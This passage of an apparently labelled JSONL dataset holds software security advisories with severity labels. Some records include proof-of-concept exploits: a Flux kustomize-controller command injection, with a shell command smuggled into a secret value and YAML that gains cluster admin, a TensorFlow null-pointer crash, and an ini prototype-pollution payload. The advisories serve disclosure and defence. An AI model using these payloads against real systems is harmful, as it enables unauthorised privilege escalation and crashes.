OSTIF.\n\n### For more information\n\nIf you have any questions or comments about this advisory:\n* Open an issue in [kustomize-controller repository](http://github.com/fluxcd/kustomize-controller)", "text_raw": "Privilege escalation to cluster admin on multi-tenant environments\n\n[Severity: HIGH]\n\nUsers that can create Kubernetes Secrets, Service Accounts and Flux Kustomization objects, could execute commands inside the kustomize-controller container by embedding a shell script in a Kubernetes Secret. This can be used to run `kubectl` commands under the Service Account of kustomize-controller, thus allowing an authenticated Kubernetes user to gain cluster admin privileges.\n\n### Impact\n\nMultitenant environments where non-admin users have permissions to create Flux Kustomization objects are affected by this issue.\n\n### Exploit \n\nTo exploit the command injection, first we create a secret with a shell command:\n\n```sh\nkubectl create secret generic exploit-token --from-literal=token=\" || kubectl api-versions\"\n```\n\nThen we create a Service Account that refers to the above Secret:\n\n```yaml\napiVersion: v1\nkind: ServiceAccount\nmetadata:\n name: exploit\n namespace: default\nautomountServiceAccountToken: false\nsecrets:\n- name: exploit-token\n```\n\nAnd finally a Kustomization that runs under the above Service Account:\n\n```yaml\napiVersion: kustomize.toolkit.fluxcd.io/v1beta1\nkind: Kustomization\nmetadata:\n name: exploit\n namespace: default\nspec:\n interval: 5m\n path: \"./deploy/\"\n sourceRef:\n kind: GitRepository\n name: app\n serviceAccountName: exploit\n```\n\nWhen kustomize-controller reconciles the above Kustomization, it will execute the shell command from the secret.\n\n### Patches\n\nThis vulnerability was fixed in kustomize-controller v0.15.0 (included in flux2 v0.18.0) released on 2021-10-08. Starting with v0.15, the kustomize-controller no longer executes shell commands on the container OS and the `kubectl` binary has been removed from the container image.\n\n### Workarounds\n\nTo prevent the creation of Kubernetes Service Accounts with `secrets` in namespaces owned by tenants, a Kubernetes validation webhook such as Gatekeeper OPA or Kyverno can be used.\n\n```yaml\napiVersion: kyverno.io/v1\nkind: ClusterPolicy\nmetadata:\n name: restrict-sa\nspec:\n validationFailureAction: enforce\n background: false\n rules:\n - name: validate-sa\n match:\n resources:\n kinds:\n - ServiceAccount\n namespaces:\n - tenant1\n - tenant2\n subjects:\n - kind: User\n name: some@tenant1.com\n - kind: User\n name: some@tenant2.com\n - kind: ServiceAccount\n name: kustomize-controller\n namespace: flux-system\n - kind: ServiceAccount\n name: helm-controller\n namespace: flux-system\n validate:\n message: \"Invalid service account\"\n pattern:\n X(secrets): \"*?\"\n```\n\n### References\n\nDisclosed by ADA Logics in a security audit of the Flux project sponsored by CNCF and facilitated by OSTIF.\n\n### For more information\n\nIf you have any questions or comments about this advisory:\n* Open an issue in [kustomize-controller repository](http://github.com/fluxcd/kustomize-controller)\n\n", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2021-11-15", "split": "train"} -{"id": "bf13a4a893ce8b86fcbb", "text": "Sydent DoS (via resource exhaustion) due to improper input validation\n\n### Impact\n\nMissing input validation of some parameters on the endpoints used to confirm third-party identifiers could cause excessive use of disk space and memory leading to resource exhaustion.\n\n### Patches\n\nFixed by 3175fd3.\n\n### For more information\n\nIf you have any questions or comments about this advisory, email us at security@matrix.org.", "text_raw": "Sydent DoS (via resource exhaustion) due to improper input validation\n\n[Severity: MEDIUM]\n\n### Impact\n\nMissing input validation of some parameters on the endpoints used to confirm third-party identifiers could cause excessive use of disk space and memory leading to resource exhaustion.\n\n### Patches\n\nFixed by 3175fd3.\n\n### For more information\n\nIf you have any questions or comments about this advisory, email us at security@matrix.org.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2021-04-16", "split": "train"} -{"id": "ace029bbda0a5e142cba", "text": "Improper Certificate Validation in proton-j\n\nThe Apache Qpid Proton-J transport includes an optional wrapper layer to perform TLS, enabled by use of the 'transport.ssl(...)' methods. Unless a verification mode was explicitly configured, client and server modes previously defaulted as documented to not verifying a peer certificate, with options to configure this explicitly or select a certificate verification mode with or without hostname verification being performed. The latter hostname verifying mode was not implemented in Apache Qpid Proton-J versions 0.3 to 0.29.0, with attempts to use it resulting in an exception. This left only the option to verify the certificate is trusted, leaving such a client vulnerable to Man In The Middle (MITM) attack. Uses of the Proton-J protocol engine which do not utilise the optional transport TLS wrapper are not impacted, e.g. usage within Qpid JMS. Uses of Proton-J utilising the optional transport TLS wrapper layer that wish to enable hostname verification must be upgraded to version 0.30.0 or later and utilise the VerifyMode#VERIFY_PEER_NAME configuration, which is now the default for client mode usage unless configured otherwise.", "text_raw": "Improper Certificate Validation in proton-j\n\n[Severity: HIGH]\n\nThe Apache Qpid Proton-J transport includes an optional wrapper layer to perform TLS, enabled by use of the 'transport.ssl(...)' methods. Unless a verification mode was explicitly configured, client and server modes previously defaulted as documented to not verifying a peer certificate, with options to configure this explicitly or select a certificate verification mode with or without hostname verification being performed. The latter hostname verifying mode was not implemented in Apache Qpid Proton-J versions 0.3 to 0.29.0, with attempts to use it resulting in an exception. This left only the option to verify the certificate is trusted, leaving such a client vulnerable to Man In The Middle (MITM) attack. Uses of the Proton-J protocol engine which do not utilise the optional transport TLS wrapper are not impacted, e.g. usage within Qpid JMS. Uses of Proton-J utilising the optional transport TLS wrapper layer that wish to enable hostname verification must be upgraded to version 0.30.0 or later and utilise the VerifyMode#VERIFY_PEER_NAME configuration, which is now the default for client mode usage unless configured otherwise.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2018-11-21", "split": "train"} -{"id": "f04892d9a3e52a13e4ec", "text": "Insufficient Entropy in DotNetNuke\n\nDNN (aka DotNetNuke) 9.2 through 9.2.1 incorrectly converts encryption key source values, resulting in lower than expected entropy.", "text_raw": "Insufficient Entropy in DotNetNuke\n\n[Severity: HIGH]\n\nDNN (aka DotNetNuke) 9.2 through 9.2.1 incorrectly converts encryption key source values, resulting in lower than expected entropy.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2019-07-05", "split": "train"} -{"id": "0d1898dcd6983ace822c", "text": "Downloads Resources over HTTP in operadriver\n\noperadriver is a Opera Driver for Selenium.\n\noperadriver versions below 0.2.3 download binary resources over HTTP, which leaves it vulnerable to MITM attacks. It may be possible to cause remote code execution (RCE) by swapping out the requested binary with an attacker controlled binary if the attacker is on the network or positioned in between the user and the remote server.\n\n## Recommendation\n\nUpdate to version 0.2.3 or later.", "text_raw": "Downloads Resources over HTTP in operadriver\n\n[Severity: HIGH]\n\noperadriver is a Opera Driver for Selenium.\n\noperadriver versions below 0.2.3 download binary resources over HTTP, which leaves it vulnerable to MITM attacks. It may be possible to cause remote code execution (RCE) by swapping out the requested binary with an attacker controlled binary if the attacker is on the network or positioned in between the user and the remote server.\n\n\n## Recommendation\n\nUpdate to version 0.2.3 or later.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2019-02-18", "split": "train"} -{"id": "212e3d6716cd957c51bc", "text": "Null pointer dereference in `SparseTensorSliceDataset`\n\n### Impact\nWhen a user does not supply arguments that determine a valid sparse tensor, `tf.raw_ops.SparseTensorSliceDataset` implementation can be made to dereference a null pointer:\n\n```python\nimport tensorflow as tf\n\ntf.raw_ops.SparseTensorSliceDataset(\n indices=[[],[],[]],\n values=[1,2,3],\n dense_shape=[3,3])\n```\n\nThe [implementation](https://github.com/tensorflow/tensorflow/blob/8d72537c6abf5a44103b57b9c2e22c14f5f49698/tensorflow/core/kernels/data/sparse_tensor_slice_dataset_op.cc#L240-L251) has some argument validation but fails to consider the case when either `indices` or `values` are provided for an empty sparse tensor when the other is not.\n\nIf `indices` is empty (as in the example above), then [code that performs validation](https://github.com/tensorflow/tensorflow/blob/8d72537c6abf5a44103b57b9c2e22c14f5f49698/tensorflow/core/kernels/data/sparse_tensor_slice_dataset_op.cc#L260-L261) (i.e., checking that the indices are monotonically increasing) results in a null pointer dereference:\n\n```cc\n for (int64_t i = 0; i < indices->dim_size(0); ++i) {\n int64_t next_batch_index = indices->matrix()(i, 0);\n ...\n }\n```\n\nIf `indices` as provided by the user is empty, then `indices` in the C++ code above is backed by an empty `std::vector`, hence calling `indices->dim_size(0)` results in null pointer dereferencing (same as calling `std::vector::at()` on an empty vector).\n\n### Patches\nWe have patched the issue in GitHub commit [02cc160e29d20631de3859c6653184e3f876b9d7](https://github.com/tensorflow/tensorflow/commit/02cc160e29d20631de3859c6653184e3f876b9d7).\n\nThe fix will be included in TensorFlow 2.6.0. We will also cherrypick this commit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are also affected and still in supported range.\n\n### For more information\nPlease consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.\n\n### Attribution\nThis vulnerability has been reported by members of the Aivul Team from Qihoo 360.", "text_raw": "Null pointer dereference in `SparseTensorSliceDataset`\n\n[Severity: HIGH]\n\n### Impact\nWhen a user does not supply arguments that determine a valid sparse tensor, `tf.raw_ops.SparseTensorSliceDataset` implementation can be made to dereference a null pointer:\n\n```python\nimport tensorflow as tf\n\ntf.raw_ops.SparseTensorSliceDataset(\n indices=[[],[],[]],\n values=[1,2,3],\n dense_shape=[3,3])\n```\n \nThe [implementation](https://github.com/tensorflow/tensorflow/blob/8d72537c6abf5a44103b57b9c2e22c14f5f49698/tensorflow/core/kernels/data/sparse_tensor_slice_dataset_op.cc#L240-L251) has some argument validation but fails to consider the case when either `indices` or `values` are provided for an empty sparse tensor when the other is not.\n\nIf `indices` is empty (as in the example above), then [code that performs validation](https://github.com/tensorflow/tensorflow/blob/8d72537c6abf5a44103b57b9c2e22c14f5f49698/tensorflow/core/kernels/data/sparse_tensor_slice_dataset_op.cc#L260-L261) (i.e., checking that the indices are monotonically increasing) results in a null pointer dereference: \n\n```cc\n for (int64_t i = 0; i < indices->dim_size(0); ++i) {\n int64_t next_batch_index = indices->matrix()(i, 0);\n ...\n }\n```\n\nIf `indices` as provided by the user is empty, then `indices` in the C++ code above is backed by an empty `std::vector`, hence calling `indices->dim_size(0)` results in null pointer dereferencing (same as calling `std::vector::at()` on an empty vector).\n\n### Patches\nWe have patched the issue in GitHub commit [02cc160e29d20631de3859c6653184e3f876b9d7](https://github.com/tensorflow/tensorflow/commit/02cc160e29d20631de3859c6653184e3f876b9d7).\n\nThe fix will be included in TensorFlow 2.6.0. We will also cherrypick this commit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are also affected and still in supported range.\n\n### For more information\nPlease consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.\n\n### Attribution\nThis vulnerability has been reported by members of the Aivul Team from Qihoo 360.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2021-08-25", "split": "train"} -{"id": "005eae8add6e4abb4979", "text": "Insufficient Session Expiration in Kiali\n\nAn insufficient JWT validation vulnerability was found in Kiali versions 0.4.0 to 1.15.0 and was fixed in Kiali version 1.15.1, wherein a remote attacker could abuse this flaw by stealing a valid JWT cookie and using that to spoof a user session, possibly gaining privileges to view and alter the Istio configuration.", "text_raw": "Insufficient Session Expiration in Kiali\n\n[Severity: HIGH]\n\nAn insufficient JWT validation vulnerability was found in Kiali versions 0.4.0 to 1.15.0 and was fixed in Kiali version 1.15.1, wherein a remote attacker could abuse this flaw by stealing a valid JWT cookie and using that to spoof a user session, possibly gaining privileges to view and alter the Istio configuration.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2021-05-18", "split": "train"} -{"id": "f9ea4d43937f1529916a", "text": "Gollum Exposure of Sensitive Information\n\nThe Precious module in gollum before 4.0.1 allows remote attackers to read arbitrary files by leveraging the lack of a certain temporary-file check.", "text_raw": "Gollum Exposure of Sensitive Information\n\n[Severity: MEDIUM]\n\nThe Precious module in gollum before 4.0.1 allows remote attackers to read arbitrary files by leveraging the lack of a certain temporary-file check.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2018-08-28", "split": "train"} -{"id": "5bc6d6eb8df7dbe1e300", "text": "Django Cross-Site Request Forgery vulnerability\n\nThe CSRF protection mechanism in Django through 1.2.7 and 1.3.x through 1.3.1 does not properly handle web-server configurations supporting arbitrary HTTP Host headers, which allows remote attackers to trigger unauthenticated forged requests via vectors involving a DNS CNAME record and a web page containing JavaScript code.", "text_raw": "Django Cross-Site Request Forgery vulnerability\n\n[Severity: HIGH]\n\nThe CSRF protection mechanism in Django through 1.2.7 and 1.3.x through 1.3.1 does not properly handle web-server configurations supporting arbitrary HTTP Host headers, which allows remote attackers to trigger unauthenticated forged requests via vectors involving a DNS CNAME record and a web page containing JavaScript code.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2018-07-23", "split": "train"} -{"id": "6bb198872ac1bea9becc", "text": "Spring Framework when used in combination with any versions of Spring Security contains an authorization bypass\n\nSpring Framework version 5.0.5 when used in combination with any versions of Spring Security contains an authorization bypass when using method security. An unauthorized malicious user can gain unauthorized access to methods that should be restricted.", "text_raw": "Spring Framework when used in combination with any versions of Spring Security contains an authorization bypass\n\n[Severity: HIGH]\n\nSpring Framework version 5.0.5 when used in combination with any versions of Spring Security contains an authorization bypass when using method security. An unauthorized malicious user can gain unauthorized access to methods that should be restricted.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2018-10-17", "split": "train"} -{"id": "16ebc62171e702801b4b", "text": "Improper Certificate Validation in Twisted\n\nIn words.protocols.jabber.xmlstream in Twisted through 19.2.1, XMPP support did not verify certificates when used with TLS, allowing an attacker to MITM connections.", "text_raw": "Improper Certificate Validation in Twisted\n\n[Severity: CRITICAL]\n\nIn words.protocols.jabber.xmlstream in Twisted through 19.2.1, XMPP support did not verify certificates when used with TLS, allowing an attacker to MITM connections.", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2019-08-16", "split": "train"} -{"id": "41750338a02092e23c7a", "text": "Apache Airflow logs passwords in plaintext\n\nIn Airflow versions prior to 1.10.13, when creating a user using airflow CLI, the password gets logged in plain text in the Log table in Airflow Metadatase. The same happenes when creating a Connection with a password field.", "text_raw": "Apache Airflow logs passwords in plaintext\n\n[Severity: LOW]\n\nIn Airflow versions prior to 1.10.13, when creating a user using airflow CLI, the password gets logged in plain text in the Log table in Airflow Metadatase. The same happenes when creating a Connection with a password field.", "severity": "low", "severity_label": 0, "source": "github_advisory", "timestamp": "2020-12-17", "split": "train"} -{"id": "ad476ef1fc4930836bee", "text": "Arbitrary Command Execution in Hadoop\n\nIn Apache Hadoop 2.7.4 to 2.7.6, the security fix for CVE-2016-6811 is incomplete. A user who can escalate to yarn user can possibly run arbitrary commands as root user.", "text_raw": "Arbitrary Command Execution in Hadoop\n\n[Severity: HIGH]\n\nIn Apache Hadoop 2.7.4 to 2.7.6, the security fix for CVE-2016-6811 is incomplete. A user who can escalate to yarn user can possibly run arbitrary commands as root user.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2018-12-21", "split": "train"} -{"id": "855fe95c9fc97e000951", "text": "Pixelpost 1.7.3 Multiple Persistent Cross-Site Scripting Vulnerabilities", "text_raw": "Pixelpost 1.7.3 Multiple Persistent Cross-Site Scripting Vulnerabilities\n\nSeverity: medium", "severity": "medium", "severity_label": 1, "source": "zeroscience", "timestamp": "2011-02-11", "split": "train"} -{"id": "1651ecdecda3eb7a61a8", "text": "Signature Malleabillity in elliptic\n\nThe Elliptic package before version 6.5.3 for Node.js allows ECDSA signature malleability via variations in encoding, leading '\\0' bytes, or integer overflows. This could conceivably have a security-relevant impact if an application relied on a single canonical signature.", "text_raw": "Signature Malleabillity in elliptic\n\n[Severity: HIGH]\n\nThe Elliptic package before version 6.5.3 for Node.js allows ECDSA signature malleability via variations in encoding, leading '\\0' bytes, or integer overflows. This could conceivably have a security-relevant impact if an application relied on a single canonical signature.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2020-07-29", "split": "train"} -{"id": "59e5d3e2b85c881761bf", "text": "Command Injection Vulnerability in systeminformation\n\n### Impact\ncommand injection vulnerability\n\n### Patches\nProblem was fixed with a parameter check. Please upgrade to version >= 5.6.4\n\n### Workarounds\nIf you cannot upgrade, be sure to check or sanitize service parameters that are passed to si.inetLatency(), si.inetChecksite(), si.services(), si.processLoad() ... do only allow strings, reject any arrays. String sanitation works as expected.", "text_raw": "Command Injection Vulnerability in systeminformation\n\n[Severity: HIGH]\n\n### Impact\ncommand injection vulnerability\n\n### Patches\nProblem was fixed with a parameter check. Please upgrade to version >= 5.6.4\n\n### Workarounds\nIf you cannot upgrade, be sure to check or sanitize service parameters that are passed to si.inetLatency(), si.inetChecksite(), si.services(), si.processLoad() ... do only allow strings, reject any arrays. String sanitation works as expected.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2021-04-06", "split": "train"} -{"id": "a0380c3519fffa3591f2", "text": "Import loops in account imports, nats-server DoS\n\n(This advisory is canonically )\n\n## Problem Description\n\nAn export/import cycle between accounts could crash the nats-server, after consuming CPU and memory.\n\nThis issue was fixed publicly in in November 2020.\n\nThe need to call this out as a security issue was highlighted by `snyk.io` and we are grateful for their assistance in doing so.\n\nOrganizations which run a NATS service providing access to accounts run by untrusted third parties are affected.\nSee below for an important caveat if running such a service.\n\n## Affected versions\n\n#### NATS Server\n\n* Version 2 prior to 2.2.0\n + 2.0.0 through and including 2.1.9 are vulnerable.\n * fixed with nats-io/nats-server PR 1731, commit 2e3c226729\n\n## Impact\n\nThe nats-server could be killed, after consuming resources.\n\n## Workaround\n\nThe import cycle requires at least two accounts to work; if you have open account sign-up, then restricting new account sign-up might hinder an attacker.\n\n## Solution\n\nUpgrade the nats-server.\n\n## Caveat on NATS with untrusted users\n\nRunning a NATS service which is exposed to untrusted users presents a heightened risk.\n\nAny remote execution flaw or equivalent seriousness, or denial-of-service by unauthenticated users, will lead to prompt releases by the NATS maintainers.\n\nFixes for denial of service issues with no threat of remote execution, when limited to account holders, are likely to just be committed to the main development branch with no special attention.\n\nThose who are running such services are encouraged to build regularly from git.", "text_raw": "Import loops in account imports, nats-server DoS\n\n[Severity: LOW]\n\n(This advisory is canonically )\n\n## Problem Description\n\nAn export/import cycle between accounts could crash the nats-server, after consuming CPU and memory.\n\nThis issue was fixed publicly in in November 2020.\n\nThe need to call this out as a security issue was highlighted by `snyk.io` and we are grateful for their assistance in doing so.\n\nOrganizations which run a NATS service providing access to accounts run by untrusted third parties are affected.\nSee below for an important caveat if running such a service.\n\n\n## Affected versions\n\n#### NATS Server\n\n * Version 2 prior to 2.2.0\n + 2.0.0 through and including 2.1.9 are vulnerable.\n * fixed with nats-io/nats-server PR 1731, commit 2e3c226729\n\n\n## Impact\n\nThe nats-server could be killed, after consuming resources.\n\n\n## Workaround\n\nThe import cycle requires at least two accounts to work; if you have open account sign-up, then restricting new account sign-up might hinder an attacker.\n\n\n## Solution\n\nUpgrade the nats-server.\n\n\n## Caveat on NATS with untrusted users\n\nRunning a NATS service which is exposed to untrusted users presents a heightened risk.\n\nAny remote execution flaw or equivalent seriousness, or denial-of-service by unauthenticated users, will lead to prompt releases by the NATS maintainers.\n\nFixes for denial of service issues with no threat of remote execution, when limited to account holders, are likely to just be committed to the main development branch with no special attention.\n\nThose who are running such services are encouraged to build regularly from git.", "severity": "low", "severity_label": 0, "source": "github_advisory", "timestamp": "2021-05-21", "split": "train"} -{"id": "ecaf7ad7c83a365a1852", "text": "Malicious Package in rrgod\n\nAll versions of `rrgod` are considered malicious. The package is malware designed to run arbitrary scripts. When installed, the package downloads an arbitrary file and executes its contents as a pre, post and install scripts.\n\n## Recommendation\n\nThis package is not available on the npm Registry anymore. If you happen to find this package in your environment you should consider the system it was installed on compromised and assess if further response (such as rotating all credentials found on the compromised machine) is necessary.", "text_raw": "Malicious Package in rrgod\n\n[Severity: CRITICAL]\n\nAll versions of `rrgod` are considered malicious. The package is malware designed to run arbitrary scripts. When installed, the package downloads an arbitrary file and executes its contents as a pre, post and install scripts.\n\n\n## Recommendation\n\nThis package is not available on the npm Registry anymore. If you happen to find this package in your environment you should consider the system it was installed on compromised and assess if further response (such as rotating all credentials found on the compromised machine) is necessary.\n", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2020-09-02", "split": "train"} -{"id": "d2cd740bbe6baf44b18c", "text": "Improper Input Validation in simple_form\n\n## Incorrect Access Control in `file_method?` in `lib/simple_form/form_builder.rb`; a user-supplied string is invoked as a method call\n\n### Impact\nFor pages that build a form using user input, it is possible for an attacker to manipulate the input and send any method present in the form object. For example:\n\n```erb\n<%= simple_form_for @user do |f| %>\n <%= f.label @user_supplied_string %>\n ...\n<% end %>\n```\n\nThe string provided in the variable `@user_supplied_string` would be invoked as a method call inside the `@user` object (unless the string contains any of the following: `password`, `time_zone`, `country`, `email`, `phone` and `url`).\n\nBy manipulation that input, an attacker could do any of the following:\n\n- Code execution (call actions like `#destroy`)\n- Denial of Service (by executing a computation intensive method)\n- Information Disclosure (check the presence of methods, leak user information)\n\n### Patches\nThe problem was fixed in version `5.0`. Although it's a major version, there should be no issues with upgrading for `4.x`. The reason it was released in a major version is that the configuration `SimpleForm.file_methods` was deprecated in order to fix the problem.\n\n### Workarounds\nThe issue only happens with pages that build forms based on user-provided input. If your application doesn't do that, you're not affected.\nA workaround is to explicitly pass which type you want for an input since the issue lies on Simple Form's automatically discovery of input types. This can be done using the `as` option, like the following:\n```erb\n<%= form.input :avatar, as: :file %>\n```\n\n### References\n[TDB]\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Open an issue in [https://github.com/plataformatec/simple_form](https://github.com/plataformatec/simple_form)\n* Email us at [opensource@plataformatec.com.br](mailto:opensource@plataformatec.com.br)", "text_raw": "Improper Input Validation in simple_form\n\n[Severity: CRITICAL]\n\n## Incorrect Access Control in `file_method?` in `lib/simple_form/form_builder.rb`; a user-supplied string is invoked as a method call\n\n### Impact\nFor pages that build a form using user input, it is possible for an attacker to manipulate the input and send any method present in the form object. For example:\n\n```erb\n<%= simple_form_for @user do |f| %>\n <%= f.label @user_supplied_string %>\n ...\n<% end %>\n```\n\nThe string provided in the variable `@user_supplied_string` would be invoked as a method call inside the `@user` object (unless the string contains any of the following: `password`, `time_zone`, `country`, `email`, `phone` and `url`).\n\nBy manipulation that input, an attacker could do any of the following:\n\n- Code execution (call actions like `#destroy`)\n- Denial of Service (by executing a computation intensive method)\n- Information Disclosure (check the presence of methods, leak user information)\n\n### Patches\nThe problem was fixed in version `5.0`. Although it's a major version, there should be no issues with upgrading for `4.x`. The reason it was released in a major version is that the configuration `SimpleForm.file_methods` was deprecated in order to fix the problem.\n\n### Workarounds\nThe issue only happens with pages that build forms based on user-provided input. If your application doesn't do that, you're not affected.\nA workaround is to explicitly pass which type you want for an input since the issue lies on Simple Form's automatically discovery of input types. This can be done using the `as` option, like the following:\n```erb\n<%= form.input :avatar, as: :file %>\n```\n\n### References\n[TDB]\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Open an issue in [https://github.com/plataformatec/simple_form](https://github.com/plataformatec/simple_form)\n* Email us at [opensource@plataformatec.com.br](mailto:opensource@plataformatec.com.br)", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2019-09-30", "split": "train"} -{"id": "155d2997b4f37b8fff5a", "text": "Malicious Package in js-3ha3\n\nVersion 0.8.0 contained malicious code. The package targeted the Ethereum cryptocurrency and performed transactions to wallets not controlled by the user.\n\n## Recommendation\n\nRemove the package from your environment. Ensure no Ethereum funds were compromised.", "text_raw": "Malicious Package in js-3ha3\n\n[Severity: CRITICAL]\n\nVersion 0.8.0 contained malicious code. The package targeted the Ethereum cryptocurrency and performed transactions to wallets not controlled by the user.\n\n\n## Recommendation\n\nRemove the package from your environment. Ensure no Ethereum funds were compromised.", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2020-09-03", "split": "train"} -{"id": "d7602670c5613cd2f6bf", "text": "SmartFoxServer 2X 2.17.0 God Mode Console WebSocket XSS", "text_raw": "SmartFoxServer 2X 2.17.0 God Mode Console WebSocket XSS\n\nSeverity: low", "severity": "low", "severity_label": 0, "source": "zeroscience", "timestamp": "2021-02-07", "split": "train"} -{"id": "533926f029b0aaaf5e5a", "text": "ini before 1.3.6 vulnerable to Prototype Pollution via ini.parse\n\n### Overview\nThe `ini` npm package before version 1.3.6 has a Prototype Pollution vulnerability.\n\nIf an attacker submits a malicious INI file to an application that parses it with `ini.parse`, they will pollute the prototype on the application. This can be exploited further depending on the context.\n\n### Patches\n\nThis has been patched in 1.3.6.\n\n### Steps to reproduce\n\npayload.ini\n```\n[__proto__]\npolluted = \"polluted\"\n```\n\npoc.js:\n```\nvar fs = require('fs')\nvar ini = require('ini')\n\nvar parsed = ini.parse(fs.readFileSync('./payload.ini', 'utf-8'))\nconsole.log(parsed)\nconsole.log(parsed.__proto__)\nconsole.log(polluted)\n```\n\n```\n> node poc.js\n{}\n{ polluted: 'polluted' }\n{ polluted: 'polluted' }\npolluted\n```", "text_raw": "ini before 1.3.6 vulnerable to Prototype Pollution via ini.parse\n\n[Severity: HIGH]\n\n### Overview\nThe `ini` npm package before version 1.3.6 has a Prototype Pollution vulnerability.\n\nIf an attacker submits a malicious INI file to an application that parses it with `ini.parse`, they will pollute the prototype on the application. This can be exploited further depending on the context.\n\n### Patches\n\nThis has been patched in 1.3.6.\n\n### Steps to reproduce\n\npayload.ini\n```\n[__proto__]\npolluted = \"polluted\"\n```\n\npoc.js:\n```\nvar fs = require('fs')\nvar ini = require('ini')\n\nvar parsed = ini.parse(fs.readFileSync('./payload.ini', 'utf-8'))\nconsole.log(parsed)\nconsole.log(parsed.__proto__)\nconsole.log(polluted)\n```\n\n```\n> node poc.js\n{}\n{ polluted: 'polluted' }\n{ polluted: 'polluted' }\npolluted\n```", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2020-12-10", "split": "train"} -{"id": "2c2b9b60326fad7a86a0", "text": "HashiCorp Consul Privilege Escalation Vulnerability\n\nHashiCorp Consul and Consul Enterprise 1.10.1 Raft RPC layer allows non-server agents with a valid certificate signed by the same CA to access server-only functionality, enabling privilege escalation. Fixed in 1.8.15, 1.9.9 and 1.10.2.", "text_raw": "HashiCorp Consul Privilege Escalation Vulnerability\n\n[Severity: HIGH]\n\nHashiCorp Consul and Consul Enterprise 1.10.1 Raft RPC layer allows non-server agents with a valid certificate signed by the same CA to access server-only functionality, enabling privilege escalation. Fixed in 1.8.15, 1.9.9 and 1.10.2.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2021-09-08", "split": "train"} -{"id": "8f63071cf424284d7ced", "text": "field_test gem contains injection vulnerability\n\nThe field_test gem 0.3.0 for Ruby has unvalidated input. A method call that is expected to return a value from a certain set of inputs can be made to return any input, which can be dangerous depending on how applications use it. If an application treats arbitrary variants as trusted, this can lead to a variety of potential vulnerabilities like SQL injection or cross-site scripting (XSS).", "text_raw": "field_test gem contains injection vulnerability\n\n[Severity: MEDIUM]\n\nThe field_test gem 0.3.0 for Ruby has unvalidated input. A method call that is expected to return a value from a certain set of inputs can be made to return any input, which can be dangerous depending on how applications use it. If an application treats arbitrary variants as trusted, this can lead to a variety of potential vulnerabilities like SQL injection or cross-site scripting (XSS).", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2019-07-16", "split": "train"} -{"id": "0f1e924e5e46ccf7b291", "text": "Amaya Web Editor 11 Remote SEH Overwrite Exploit", "text_raw": "Amaya Web Editor 11 Remote SEH Overwrite Exploit\n\nSeverity: high", "severity": "high", "severity_label": 2, "source": "zeroscience", "timestamp": "2009-01-30", "split": "train"} -{"id": "268c27d9f3c528584b24", "text": "quinn invalidly assumes the memory layout of std::net::SocketAddr\n\nThe quinn crate has assumed std::net::SocketAddrV4 and std::net::SocketAddrV6 have the same memory layout as the system C representation sockaddr. It has simply casted the pointers to convert the socket addresses to the system representation. The standard library does not say anything about the memory layout, and this will cause invalid memory access if the standard library changes the implementation. No warnings or errors will be emitted once the change happens.", "text_raw": "quinn invalidly assumes the memory layout of std::net::SocketAddr\n\n[Severity: HIGH]\n\nThe quinn crate has assumed std::net::SocketAddrV4 and std::net::SocketAddrV6 have the same memory layout as the system C representation sockaddr. It has simply casted the pointers to convert the socket addresses to the system representation. The standard library does not say anything about the memory layout, and this will cause invalid memory access if the standard library changes the implementation. No warnings or errors will be emitted once the change happens.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2021-08-25", "split": "train"} -{"id": "7e0de00e3b6ab44c04b8", "text": "Persistent XSS in customer module in Shopware\n\n### Impact\nPersistent XSS in customer module\n\n### Patches\n\nWe recommend updating to the current version 5.6.9. You can get the update to 5.6.9 regularly via the Auto-Updater or directly via the download overview.\n\nFor older versions you can use the Security Plugin:\nhttps://store.shopware.com/en/swag575294366635f/shopware-security-plugin.html\n\n### References\nhttps://docs.shopware.com/en/shopware-5-en/security-updates/security-update-11-2020", "text_raw": "Persistent XSS in customer module in Shopware\n\n[Severity: LOW]\n\n### Impact\nPersistent XSS in customer module\n\n### Patches\n\nWe recommend updating to the current version 5.6.9. You can get the update to 5.6.9 regularly via the Auto-Updater or directly via the download overview.\n\nFor older versions you can use the Security Plugin:\nhttps://store.shopware.com/en/swag575294366635f/shopware-security-plugin.html\n\n### References\nhttps://docs.shopware.com/en/shopware-5-en/security-updates/security-update-11-2020", "severity": "low", "severity_label": 0, "source": "github_advisory", "timestamp": "2020-11-13", "split": "train"} -{"id": "e5089d0923d21d390cd7", "text": "Prototype Pollution in multi-ini\n\nThis affects the package multi-ini before 2.1.1. It is possible to pollute an object's prototype by specifying the proto object as part of an array.", "text_raw": "Prototype Pollution in multi-ini\n\n[Severity: CRITICAL]\n\nThis affects the package multi-ini before 2.1.1. It is possible to pollute an object's prototype by specifying the proto object as part of an array.", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2021-04-13", "split": 